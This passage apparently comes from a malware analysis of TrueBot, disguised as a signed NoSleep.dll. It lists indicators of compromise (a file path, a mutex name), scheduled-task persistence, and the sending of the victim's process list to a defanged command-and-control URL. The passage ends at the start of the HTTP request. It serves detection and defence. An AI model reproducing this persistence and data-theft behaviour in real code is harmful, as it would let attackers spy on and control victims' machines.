 The library NoSleep.dll, signed with a Sectigo certificate, is none other than the TrueBot malware:

-Thanks to reverse engineering and dynamic analysis, it was possible to reconstruct its entire behavior.
 The first identified activities are related to assigning a unique identifier to the infected machine.
 This is achieved by creating the file C:\ProgramData\<GUI>.JSONIP and a mutex with the name (u3qkfewi3ujrk32lqpti32ofwq)

 Subsequently, the malware proceeds to create two scheduled tasks to ensure persistence in the system:

-At this point, a list of executables associated with active processes is created, excluding system services.
 Finally, this list is sent in URLEncode + Base64 format to the Command and Control server via a POST to the URL hxxp://droogggdhfhf[.]com/gate.php.

 POST /gate.php HTTP/1.0